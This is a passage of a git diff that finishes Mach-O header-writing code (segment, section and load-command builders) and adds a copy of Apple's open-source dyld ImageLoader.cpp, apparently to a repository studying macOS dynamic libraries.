+} + +void Header::updateUUID(uuid_t uuid) +{ + __block bool found = false; + forEachLoadCommandSafe(^(const load_command *cmd, bool &stop) { + if ( cmd->cmd == LC_UUID ) { + memcpy(((uuid_command*)cmd)->uuid, uuid, 16); + found = true; + stop = true; + } + }); + assert(found && "updateUUID called without a LC_UUID command"); +} + +void Header::addSegment(const SegmentInfo& info, std::span sectionNames) +{ + if ( is64() ) { + uint32_t lcSize = (uint32_t)(sizeof(segment_command_64) + sectionNames.size() * sizeof(section_64)); + segment_command_64* sc = (segment_command_64*)appendLoadCommand(LC_SEGMENT_64, lcSize); + strncpy(sc->segname, info.segmentName.data(), 16); + sc->vmaddr = info.vmaddr; + sc->vmsize = info.vmsize; + sc->fileoff = info.fileOffset; + sc->filesize = info.fileSize; + sc->initprot = info.perms; + sc->maxprot = info.perms; + sc->nsects = (uint32_t)sectionNames.size(); + sc->flags = info.flags; + section_64* const sect = (section_64*)((uint8_t*)sc + sizeof(struct segment_command_64)); + uint32_t sectionIndex = 0; + for ( const char* sectName : sectionNames ) { + strncpy(sect[sectionIndex].segname, info.segmentName.data(), 16); + strncpy(sect[sectionIndex].sectname, sectName, 16); + ++sectionIndex; + } + } + else { + uint32_t lcSize = (uint32_t)(sizeof(segment_command) + sectionNames.size() * sizeof(section)); + segment_command* sc = (segment_command*)appendLoadCommand(LC_SEGMENT, lcSize); + strncpy(sc->segname, info.segmentName.data(), 16); + sc->vmaddr = (uint32_t)info.vmaddr; + sc->vmsize = (uint32_t)info.vmsize; + sc->fileoff = info.fileOffset; + sc->filesize = info.fileSize; + sc->initprot = info.perms; + sc->maxprot = info.perms; + sc->nsects = (uint32_t)sectionNames.size(); + sc->flags = info.flags; + section* const sect = (section*)((uint8_t*)sc + sizeof(struct segment_command)); + uint32_t sectionIndex = 0; + for ( const char* sectName : sectionNames ) { + strncpy(sect[sectionIndex].segname, info.segmentName.data(), 16); + strncpy(sect[sectionIndex].sectname, sectName, 16); + ++sectionIndex; + } + } +} + +void Header::updateSection(const SectionInfo& info) +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + segment_command_64* segCmd = (segment_command_64*)cmd; + if (info.segmentName == segCmd->segname) { + section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + section_64* const sectionsEnd = §ionsStart[segCmd->nsects]; + for ( section_64* sect=sectionsStart; sect < sectionsEnd; ++sect ) { + if ( strncmp(info.sectionName.data(), sect->sectname, 16) == 0 ) { + sect->addr = info.address; + sect->size = info.size; + sect->offset = info.fileOffset; + sect->align = info.alignment; + sect->reloff = info.relocsOffset; + sect->nreloc = info.relocsCount; + sect->flags = info.flags; + sect->reserved1 = info.reserved1; + sect->reserved2 = info.reserved2; + sect->reserved3 = 0; + stop = true; + return; + } + } + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + segment_command* segCmd = (segment_command*)cmd; + if (info.segmentName == segCmd->segname) { + section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + section* const sectionsEnd = §ionsStart[segCmd->nsects]; + for ( section* sect=sectionsStart; sect < sectionsEnd; ++sect ) { + if ( strncmp(info.sectionName.data(), sect->sectname, 16) == 0 ) { + sect->addr = (uint32_t)info.address; + sect->size = (uint32_t)info.size; + sect->offset = info.fileOffset; + sect->align = info.alignment; + sect->reloff = info.relocsOffset; + sect->nreloc = info.relocsCount; + sect->flags = info.flags; + sect->reserved1 = info.reserved1; + sect->reserved2 = info.reserved2; + stop = true; + return; + } + } + } + } + }); +} + +void Header::updateSegment(const SegmentInfo& info) +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + segment_command_64* segCmd = (segment_command_64*)cmd; + if (info.segmentName == segCmd->segname) { + segCmd->vmaddr = info.vmaddr; + segCmd->vmsize = info.vmsize; + segCmd->fileoff = info.fileOffset; + segCmd->filesize = info.fileSize; + segCmd->initprot = info.perms; + segCmd->maxprot = info.perms; + stop = true; + return; + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + segment_command* segCmd = (segment_command*)cmd; + if (info.segmentName == segCmd->segname) { + segCmd->vmaddr = (uint32_t)info.vmaddr; + segCmd->vmsize = (uint32_t)info.vmsize; + segCmd->fileoff = info.fileOffset; + segCmd->filesize = info.fileSize; + segCmd->initprot = info.perms; + segCmd->maxprot = info.perms; + stop = true; + return; + } + } + }); +} + + +void Header::addInstallName(const char* name, Version32 compatVers, Version32 currentVersion) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylib_command) + strlen(name) + 1)); + dylib_command* ic = (dylib_command*)appendLoadCommand(LC_ID_DYLIB, alignedSize); + ic->dylib.name.offset = sizeof(dylib_command); + ic->dylib.current_version = currentVersion.value(); + ic->dylib.compatibility_version = compatVers.value(); + strcpy((char*)ic + ic->dylib.name.offset, name); +} + +void Header::addDependentDylib(const char* path, bool isWeak, bool isUpward, bool isReexport, Version32 compatVers, Version32 currentVersion) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylib_command) + strlen(path) + 1)); + dylib_command* dc = (dylib_command*)appendLoadCommand(LC_LOAD_DYLIB, alignedSize); + if ( isReexport ) + dc->cmd = LC_REEXPORT_DYLIB; + else if ( isUpward ) + dc->cmd = LC_LOAD_UPWARD_DYLIB; + else if ( isWeak ) + dc->cmd = LC_LOAD_WEAK_DYLIB; + dc->dylib.name.offset = sizeof(dylib_command); + dc->dylib.current_version = currentVersion.value(); + dc->dylib.compatibility_version = compatVers.value(); + dc->dylib.timestamp = 2; // needs to be some constant value that is different than dylib id load command + strcpy((char*)dc + dc->dylib.name.offset, path); +} + +void Header::addLibSystem() +{ + addDependentDylib("/usr/lib/libSystem.B.dylib"); +} + +void Header::addDylibId(CString name, Version32 compatVers, Version32 currentVersion) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylib_command) + name.size() + 1)); + dylib_command* dc = (dylib_command*)appendLoadCommand(LC_ID_DYLIB, alignedSize); + dc->dylib.name.offset = sizeof(dylib_command); + dc->dylib.timestamp = 1; // needs to be some constant value that is different than dependent dylib + dc->dylib.current_version = currentVersion.value(); + dc->dylib.compatibility_version = compatVers.value(); + strcpy((char*)dc + dc->dylib.name.offset, name.c_str()); +} + +void Header::addDyldID() +{ + const char* path = "/usr/lib/dyld"; + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylinker_command) + strlen(path) + 1)); + dylinker_command* dc = (dylinker_command*)appendLoadCommand(LC_ID_DYLINKER, alignedSize); + dc->name.offset = sizeof(dylinker_command); + strcpy((char*)dc + dc->name.offset, path); +} + +void Header::addDynamicLinker() +{ + const char* path = "/usr/lib/dyld"; + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylinker_command) + strlen(path) + 1)); + dylinker_command* dc = (dylinker_command*)appendLoadCommand(LC_LOAD_DYLINKER, alignedSize); + dc->name.offset = sizeof(dylinker_command); + strcpy((char*)dc + dc->name.offset, path); +} + +void Header::addFairPlayEncrypted(uint32_t offset, uint32_t size) +{ + if ( is64() ) { + encryption_info_command_64 en64; + en64.cmd = LC_ENCRYPTION_INFO_64; + en64.cmdsize = sizeof(encryption_info_command_64); + en64.cryptoff = offset; + en64.cryptsize = size; + en64.cryptid = 0; + en64.pad = 0; + appendLoadCommand((load_command*)&en64); + } + else { + encryption_info_command en32; + en32.cmd = LC_ENCRYPTION_INFO; + en32.cmdsize = sizeof(encryption_info_command); + en32.cryptoff = offset; + en32.cryptsize = size; + en32.cryptid = 0; + appendLoadCommand((load_command*)&en32); + } +} + +void Header::addRPath(const char* path) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(rpath_command) + strlen(path) + 1)); + rpath_command* rc = (rpath_command*)appendLoadCommand(LC_RPATH, alignedSize); + rc->path.offset = sizeof(rpath_command); + strcpy((char*)rc + rc->path.offset, path); +} + +void Header::addDyldEnvVar(const char* path) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylinker_command) + strlen(path) + 1)); + dylinker_command* dc = (dylinker_command*)appendLoadCommand(LC_DYLD_ENVIRONMENT, alignedSize); + dc->name.offset = sizeof(dylinker_command); + strcpy((char*)dc + dc->name.offset, path); +} + +void Header::addAllowableClient(const char* clientName) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(sub_client_command) + strlen(clientName) + 1)); + sub_client_command* ac = (sub_client_command*)appendLoadCommand(LC_SUB_CLIENT, alignedSize); + ac->client.offset = sizeof(sub_client_command); + strcpy((char*)ac + ac->client.offset, clientName); +} + +void Header::addUmbrellaName(const char* umbrellaName) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(sub_framework_command) + strlen(umbrellaName) + 1)); + sub_framework_command* ac = (sub_framework_command*)appendLoadCommand(LC_SUB_FRAMEWORK, alignedSize); + ac->umbrella.offset = sizeof(sub_framework_command); + strcpy((char*)ac + ac->umbrella.offset, umbrellaName); +} + +void Header::addSourceVersion(Version64 vers) +{ + source_version_command svc; + svc.cmd = LC_SOURCE_VERSION; + svc.cmdsize = sizeof(source_version_command); + svc.version = vers.value(); + appendLoadCommand((load_command*)&svc); +} + +void Header::setMain(uint32_t offset) +{ + entry_point_command ec; + ec.cmd = LC_MAIN; + ec.cmdsize = sizeof(entry_point_command); + ec.entryoff = offset; + ec.stacksize = 0; + appendLoadCommand((load_command*)&ec); +} + +void Header::setCustomStackSize(uint64_t stackSize) { + __block bool found = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if (cmd->cmd == LC_MAIN) { + entry_point_command* ec = (entry_point_command*)cmd; + ec->stacksize = stackSize; + found = true; + stop = true; + } + }); + assert(found); +} + +void Header::setUnixEntry(uint64_t startAddr) +{ + // FIXME: support other archs + if ( (mh.cputype == CPU_TYPE_ARM64) || (mh.cputype == CPU_TYPE_ARM64_32) ) { + uint32_t lcSize = 288; + uint32_t* words = (uint32_t*)appendLoadCommand(LC_UNIXTHREAD, lcSize); + words[2] = 6; // flavor = ARM_THREAD_STATE64 + words[3] = 68; // count = ARM_EXCEPTION_STATE64_COUNT + bzero(&words[4], lcSize-16); + *(uint64_t*)(&words[68]) = startAddr; // register pc = startAddr + } + else if ( mh.cputype == CPU_TYPE_X86_64 ) { + uint32_t lcSize = 184; + uint32_t* words = (uint32_t*)appendLoadCommand(LC_UNIXTHREAD, lcSize); + words[2] = 4; // flavor = x86_THREAD_STATE64 + words[3] = 42; // count = x86_THREAD_STATE64_COUNT + bzero(&words[4], lcSize-16); + *(uint64_t*)(&words[36]) = startAddr; // register pc = startAddr + } + else { + assert(0 && "arch not supported"); + } +} + +void Header::addCodeSignature(uint32_t fileOffset, uint32_t fileSize) +{ + linkedit_data_command lc; + lc.cmd = LC_CODE_SIGNATURE; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = fileOffset; + lc.datasize = fileSize; + appendLoadCommand((load_command*)&lc); +} + +void Header::setBindOpcodesInfo(uint32_t rebaseOffset, uint32_t rebaseSize, + uint32_t bindsOffset, uint32_t bindsSize, + uint32_t weakBindsOffset, uint32_t weakBindsSize, + uint32_t lazyBindsOffset, uint32_t lazyBindsSize, + uint32_t exportTrieOffset, uint32_t exportTrieSize) +{ + dyld_info_command lc; + lc.cmd = LC_DYLD_INFO_ONLY; + lc.cmdsize = sizeof(dyld_info_command); + lc.rebase_off = rebaseOffset; + lc.rebase_size = rebaseSize; + lc.bind_off = bindsOffset; + lc.bind_size = bindsSize; + lc.weak_bind_off = weakBindsOffset; + lc.weak_bind_size = weakBindsSize; + lc.lazy_bind_off = lazyBindsOffset; + lc.lazy_bind_size = lazyBindsSize; + lc.export_off = exportTrieOffset; + lc.export_size = exportTrieSize; + appendLoadCommand((load_command*)&lc); +} + +void Header::setChainedFixupsInfo(uint32_t cfOffset, uint32_t cfSize) +{ + linkedit_data_command lc; + lc.cmd = LC_DYLD_CHAINED_FIXUPS; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = cfOffset; + lc.datasize = cfSize; + appendLoadCommand((load_command*)&lc); +} + +void Header::setExportTrieInfo(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_DYLD_EXPORTS_TRIE; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setSplitSegInfo(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_SEGMENT_SPLIT_INFO; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setDataInCode(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_DATA_IN_CODE; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setFunctionStarts(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_FUNCTION_STARTS; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setAtomInfo(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_ATOM_INFO; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setSymbolTable(uint32_t nlistOffset, uint32_t nlistCount, uint32_t stringPoolOffset, uint32_t stringPoolSize, + uint32_t localsCount, uint32_t globalsCount, uint32_t undefCount, uint32_t indOffset, uint32_t indCount) +{ + symtab_command stc; + stc.cmd = LC_SYMTAB; + stc.cmdsize = sizeof(symtab_command); + stc.symoff = nlistOffset; + stc.nsyms = nlistCount; + stc.stroff = stringPoolOffset; + stc.strsize = stringPoolSize; + appendLoadCommand((load_command*)&stc); + + dysymtab_command dstc; + bzero(&dstc, sizeof(dstc)); + dstc.cmd = LC_DYSYMTAB; + dstc.cmdsize = sizeof(dysymtab_command); + dstc.ilocalsym = 0; + dstc.nlocalsym = localsCount; + dstc.iextdefsym = localsCount; + dstc.nextdefsym = globalsCount; + dstc.iundefsym = localsCount+globalsCount; + dstc.nundefsym = undefCount; + dstc.indirectsymoff = indOffset; + dstc.nindirectsyms = indCount; + appendLoadCommand((load_command*)&dstc); +} + +void Header::addLinkerOption(std::span buffer, uint32_t count) +{ + uint32_t cmdSize = pointerAligned(sizeof(linker_option_command) + (uint32_t)buffer.size()); + + linker_option_command* lc = (linker_option_command*)appendLoadCommand(LC_LINKER_OPTION, cmdSize); + lc->cmd = LC_LINKER_OPTION; + lc->cmdsize = cmdSize; + lc->count = count; + memcpy((uint8_t*)(lc + 1), buffer.data(), buffer.size()); +} + +Header::LinkerOption Header::LinkerOption::make(std::span opts) +{ + LinkerOption out; + out.count = (uint32_t)opts.size(); + assert(out.count == opts.size()); + for ( CString option : opts ) { + if ( option.empty() ) + continue; + size_t previousSize = out.buffer.size(); + out.buffer.resize(previousSize + option.size() + 1); + option.strcpy((char*)out.buffer.data() + previousSize); + } + return out; +} + +load_command* Header::findLoadCommand(uint32_t cmdNum) +{ + __block load_command* result = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == cmdNum ) { + result = (load_command*)cmd; + stop = true; + } + }); + return result; +} + +void Header::removeLoadCommand(void (^callback)(const load_command* cmd, bool& remove, bool& stop)) +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( mh.magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char*)this + sizeof(mach_header_64)); + else if ( mh.magic == MH_MAGIC ) + startCmds = (load_command*)((char*)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return; // can't process big endian mach-o + else { + //const uint32_t* h = (uint32_t*)this; + //diag.error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h [1]); + return; // not a mach-o file + } + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + mh.sizeofcmds); + auto cmd = (load_command*)startCmds; + const uint32_t origNcmds = mh.ncmds; + unsigned bytesRemaining = mh.sizeofcmds; + for ( uint32_t i = 0; i < origNcmds; ++i ) { + bool remove = false; + auto nextCmd = (load_command*)((char*)cmd + cmd->cmdsize); + if ( cmd->cmdsize < 8 ) { + //diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) too small", i, mh.ncmds, cmd, this, cmd->cmdsize); + return; + } + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + //diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, mh.ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + return; + } + callback(cmd, remove, stop); + if ( remove ) { + mh.sizeofcmds -= cmd->cmdsize; + ::memmove((void*)cmd, (void*)nextCmd, bytesRemaining); + mh.ncmds--; + } + else { + bytesRemaining -= cmd->cmdsize; + cmd = nextCmd; + } + if ( stop ) + break; + } + if ( cmd ) + ::bzero(cmd, bytesRemaining); +} + +uint32_t Header::relocatableHeaderAndLoadCommandsSize(bool is64, uint32_t sectionCount, uint32_t platformsCount, std::span linkerOptions) +{ + uint32_t size = 0; + if ( is64 ) { + size += sizeof(mach_header_64); + size += sizeof(segment_command_64); + size += sizeof(section_64) * sectionCount; + } + else { + size += sizeof(mach_header); + size += sizeof(segment_command); + size += sizeof(section) * sectionCount; + } + size += sizeof(symtab_command); + size += sizeof(dysymtab_command); + size += sizeof(build_version_command) * platformsCount; + size += sizeof(linkedit_data_command); + + for ( Header::LinkerOption opt : linkerOptions ) { + size += opt.lcSize(); + } + return size; +} + +void Header::setRelocatableSectionCount(uint32_t sectionCount) +{ + assert(mh.filetype == MH_OBJECT); + if ( is64() ) { + uint32_t lcSize = (uint32_t)(sizeof(segment_command_64) + sectionCount * sizeof(section_64)); + segment_command_64* sc = (segment_command_64*)appendLoadCommand(LC_SEGMENT_64, lcSize); + sc->segname[0] = '\0'; // MH_OBJECT has one segment with no name + sc->vmaddr = 0; + sc->vmsize = 0; // adjusted in updateRelocatableSegmentSize() + sc->fileoff = 0; + sc->filesize = 0; // adjusted in updateRelocatableSegmentSize() + sc->initprot = 7; + sc->maxprot = 7; + sc->nsects = sectionCount; + // section info to be filled in later by setRelocatableSectionInfo() + bzero((uint8_t*)sc + sizeof(segment_command_64), sectionCount * sizeof(section_64)); + } + else { + uint32_t lcSize = (uint32_t)(sizeof(segment_command) + sectionCount * sizeof(section)); + segment_command* sc = (segment_command*)appendLoadCommand(LC_SEGMENT, lcSize); + sc->segname[0] = '\0'; // MH_OBJECT has one segment with no name + sc->vmaddr = 0; + sc->vmsize = 0x1000; // FIXME: need dynamic segment layout + sc->fileoff = 0; + sc->filesize = 0x1000; + sc->initprot = 7; + sc->maxprot = 7; + sc->nsects = sectionCount; + // section info to be filled in later by setRelocatableSectionInfo() + bzero((uint8_t*)sc + sizeof(segment_command), sectionCount * sizeof(struct section)); + } +} + +void Header::updateRelocatableSegmentSize(uint64_t vmSize, uint32_t fileSize) +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT ) { + segment_command* sc = (segment_command*)cmd; + sc->vmsize = (uint32_t)vmSize; + sc->filesize = fileSize; + stop = true; + } + else if ( cmd->cmd == LC_SEGMENT_64 ) { + segment_command_64* sc = (segment_command_64*)cmd; + sc->vmsize = vmSize; + sc->filesize = fileSize; + stop = true; + } + }); +} + + +void Header::setRelocatableSectionInfo(uint32_t sectionIndex, const char* segName, const char* sectName, + uint32_t flags, uint64_t address, uint64_t size, uint32_t fileOffset, + uint16_t alignment, uint32_t relocsOffset, uint32_t relocsCount) +{ + __block struct section* section32 = nullptr; + __block struct section_64* section64 = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT ) { + struct section* sections = (struct section*)((uint8_t*)cmd + sizeof(segment_command)); + section32 = §ions[sectionIndex]; + stop = true; + } + else if ( cmd->cmd == LC_SEGMENT_64 ) { + struct section_64* sections = (struct section_64*)((uint8_t*)cmd + sizeof(segment_command_64)); + section64 = §ions[sectionIndex]; + stop = true; + } + }); + if ( section64 != nullptr ) { + strncpy(section64->segname, segName, 16); + strncpy(section64->sectname, sectName, 16); + section64->addr = address; + section64->size = size; + section64->offset = fileOffset; + section64->align = alignment; + section64->reloff = relocsOffset; + section64->nreloc = relocsCount; + section64->flags = flags; + section64->reserved1 = 0; + section64->reserved2 = 0; + section64->reserved3 = 0; + } + else if ( section32 != nullptr ) { + strncpy(section32->segname, segName, 16); + strncpy(section32->sectname, sectName, 16); + section32->addr = (uint32_t)address; + section32->size = (uint32_t)size; + section32->offset = fileOffset; + section32->align = alignment; + section32->reloff = relocsOffset; + section32->nreloc = relocsCount; + section32->flags = flags; + section32->reserved1 = 0; + section32->reserved2 = 0; + } +} + +#endif // BUILDING_MACHO_WRITER + + +} // namespace dyld3 \ No newline at end of file diff --git a/IV. Dylibs/macos/ImageLoader.cpp b/IV. Dylibs/macos/ImageLoader.cpp new file mode 100644 index 0000000..4ab0ca2 --- /dev/null +++ b/IV. Dylibs/macos/ImageLoader.cpp @@ -0,0 +1,1966 @@ +// Source: https://github.com/apple-oss-distributions/dyld/blob/3f24a36068a96722cf3acbd5087983ce658e9d70/src/ImageLoader.cpp#L729 +/* -*- mode: C++; c-basic-offset: 4; tab-width: 4 -*- + * Copyright (c) 2004-2010 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#define __STDC_LIMIT_MACROS +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "Tracing.h" + +#include "ImageLoader.h" + + +uint32_t ImageLoader::fgImagesUsedFromSharedCache = 0; +uint32_t ImageLoader::fgImagesWithUsedPrebinding = 0; +uint32_t ImageLoader::fgImagesRequiringCoalescing = 0; +uint32_t ImageLoader::fgImagesHasWeakDefinitions = 0; +uint32_t ImageLoader::fgTotalRebaseFixups = 0; +uint32_t ImageLoader::fgTotalBindFixups = 0; +uint32_t ImageLoader::fgTotalBindSymbolsResolved = 0; +uint32_t ImageLoader::fgTotalBindImageSearches = 0; +uint32_t ImageLoader::fgTotalLazyBindFixups = 0; +uint32_t ImageLoader::fgTotalPossibleLazyBindFixups = 0; +uint32_t ImageLoader::fgTotalSegmentsMapped = 0; +uint64_t ImageLoader::fgTotalBytesMapped = 0; +uint64_t ImageLoader::fgTotalLoadLibrariesTime; +uint64_t ImageLoader::fgTotalObjCSetupTime = 0; +uint64_t ImageLoader::fgTotalDebuggerPausedTime = 0; +uint64_t ImageLoader::fgTotalRebindCacheTime = 0; +uint64_t ImageLoader::fgTotalRebaseTime; +uint64_t ImageLoader::fgTotalBindTime; +uint64_t ImageLoader::fgTotalWeakBindTime; +uint64_t ImageLoader::fgTotalDOF; +uint64_t ImageLoader::fgTotalInitTime; +uint16_t ImageLoader::fgLoadOrdinal = 0; +uint32_t ImageLoader::fgSymbolTrieSearchs = 0; +std::vectorImageLoader::fgInterposingTuples; +uintptr_t ImageLoader::fgNextPIEDylibAddress = 0; + + + +ImageLoader::ImageLoader(const char* path, unsigned int libCount) + : fPath(path), fRealPath(NULL), fDevice(0), fInode(0), fLastModified(0), + fPathHash(0), fDlopenReferenceCount(0), fInitializerRecursiveLock(NULL), + fLoadOrder(fgLoadOrdinal++), fDepth(0), fObjCMappedNotified(false), fState(0), fLibraryCount(libCount), + fMadeReadOnly(false), fAllLibraryChecksumsAndLoadAddressesMatch(false), fLeaveMapped(false), fNeverUnload(false), + fHideSymbols(false), fMatchByInstallName(false), + fInterposed(false), fRegisteredDOF(false), fAllLazyPointersBound(false), + fBeingRemoved(false), fAddFuncNotified(false), + fPathOwnedByImage(false), fIsReferencedDownward(false), + fWeakSymbolsBound(false) +{ +#if __x86_64__ + fAotPath = NULL; +#endif + if ( fPath != NULL ) + fPathHash = hash(fPath); + if ( libCount > 512 ) + dyld::throwf("too many dependent dylibs in %s", path); +} + + +void ImageLoader::deleteImage(ImageLoader* image) +{ + delete image; +} + + +ImageLoader::~ImageLoader() +{ + if ( fRealPath != NULL ) + delete [] fRealPath; + if ( fPathOwnedByImage && (fPath != NULL) ) + delete [] fPath; +#if __x86_64__ + if ( fAotPath != NULL ) + delete [] fAotPath; +#endif +} + +void ImageLoader::setFileInfo(dev_t device, ino_t inode, time_t modDate) +{ + fDevice = device; + fInode = inode; + fLastModified = modDate; +} + +void ImageLoader::setMapped(const LinkContext& context) +{ + fState = dyld_image_state_mapped; + context.notifySingle(dyld_image_state_mapped, this, NULL); // note: can throw exception +} + +int ImageLoader::compare(const ImageLoader* right) const +{ + if ( this->fDepth == right->fDepth ) { + if ( this->fLoadOrder == right->fLoadOrder ) + return 0; + else if ( this->fLoadOrder < right->fLoadOrder ) + return -1; + else + return 1; + } + else { + if ( this->fDepth < right->fDepth ) + return -1; + else + return 1; + } +} + +void ImageLoader::setPath(const char* path) +{ + if ( fPathOwnedByImage && (fPath != NULL) ) + delete [] fPath; + fPath = new char[strlen(path)+1]; + strcpy((char*)fPath, path); + fPathOwnedByImage = true; // delete fPath when this image is destructed + fPathHash = hash(fPath); + if ( fRealPath != NULL ) { + delete [] fRealPath; + fRealPath = NULL; + } +} + +void ImageLoader::setPathUnowned(const char* path) +{ + if ( fPathOwnedByImage && (fPath != NULL) ) { + delete [] fPath; + } + fPath = path; + fPathOwnedByImage = false; + fPathHash = hash(fPath); +} + +void ImageLoader::setPaths(const char* path, const char* realPath) +{ + this->setPath(path); + fRealPath = new char[strlen(realPath)+1]; + strcpy((char*)fRealPath, realPath); +} + + +const char* ImageLoader::getRealPath() const +{ + if ( fRealPath != NULL ) + return fRealPath; + else + return fPath; +} + +uint32_t ImageLoader::hash(const char* path) +{ + // this does not need to be a great hash + // it is just used to reduce the number of strcmp() calls + // of existing images when loading a new image + uint32_t h = 0; + for (const char* s=path; *s != '\0'; ++s) + h = h*5 + *s; + return h; +} + +bool ImageLoader::matchInstallPath() const +{ + return fMatchByInstallName; +} + +void ImageLoader::setMatchInstallPath(bool match) +{ + fMatchByInstallName = match; +} + +bool ImageLoader::statMatch(const struct stat& stat_buf) const +{ + return ( (this->fDevice == stat_buf.st_dev) && (this->fInode == stat_buf.st_ino) ); +} + +const char* ImageLoader::shortName(const char* fullName) +{ + // try to return leaf name + if ( fullName != NULL ) { + const char* s = strrchr(fullName, '/'); + if ( s != NULL ) + return &s[1]; + } + return fullName; +} + +const char* ImageLoader::getShortName() const +{ + return shortName(fPath); +} + +void ImageLoader::setLeaveMapped() +{ + fLeaveMapped = true; +} + +void ImageLoader::setHideExports(bool hide) +{ + fHideSymbols = hide; +} + +bool ImageLoader::hasHiddenExports() const +{ + return fHideSymbols; +} + +bool ImageLoader::isLinked() const +{ + return (fState >= dyld_image_state_bound); +} + +time_t ImageLoader::lastModified() const +{ + return fLastModified; +} + +bool ImageLoader::containsAddress(const void* addr) const +{ + for(unsigned int i=0, e=segmentCount(); i < e; ++i) { + const uint8_t* start = (const uint8_t*)segActualLoadAddress(i); + const uint8_t* end = (const uint8_t*)segActualEndAddress(i); + if ( (start <= addr) && (addr < end) && !segUnaccessible(i) ) + return true; + } + return false; +} + +bool ImageLoader::overlapsWithAddressRange(const void* start, const void* end) const +{ + for(unsigned int i=0, e=segmentCount(); i < e; ++i) { + const uint8_t* segStart = (const uint8_t*)segActualLoadAddress(i); + const uint8_t* segEnd = (const uint8_t*)segActualEndAddress(i); + if ( strcmp(segName(i), "__UNIXSTACK") == 0 ) { + // __UNIXSTACK never slides. This is the only place that cares + // and checking for that segment name in segActualLoadAddress() + // is too expensive. + segStart -= getSlide(); + segEnd -= getSlide(); + } + if ( (start <= segStart) && (segStart < end) ) + return true; + if ( (start <= segEnd) && (segEnd < end) ) + return true; + if ( (segStart < start) && (end < segEnd) ) + return true; + } + return false; +} + +void ImageLoader::getMappedRegions(MappedRegion*& regions) const +{ + for(unsigned int i=0, e=segmentCount(); i < e; ++i) { + MappedRegion region; + region.address = segActualLoadAddress(i); + region.size = segSize(i); + *regions++ = region; + } +} + + + +bool ImageLoader::dependsOn(ImageLoader* image) { + for(unsigned int i=0; i < libraryCount(); ++i) { + if ( libImage(i) == image ) + return true; + } + return false; +} + + +static bool notInImgageList(const ImageLoader* image, const ImageLoader** dsiStart, const ImageLoader** dsiCur) +{ + for (const ImageLoader** p = dsiStart; p < dsiCur; ++p) + if ( *p == image ) + return false; + return true; +} + +bool ImageLoader::findExportedSymbolAddress(const LinkContext& context, const char* symbolName, + const ImageLoader* requestorImage, int requestorOrdinalOfDef, + bool runResolver, const ImageLoader** foundIn, uintptr_t* address) const +{ + const Symbol* sym = this->findExportedSymbol(symbolName, true, foundIn); + if ( sym != NULL ) { + *address = (*foundIn)->getExportedSymbolAddress(sym, context, requestorImage, 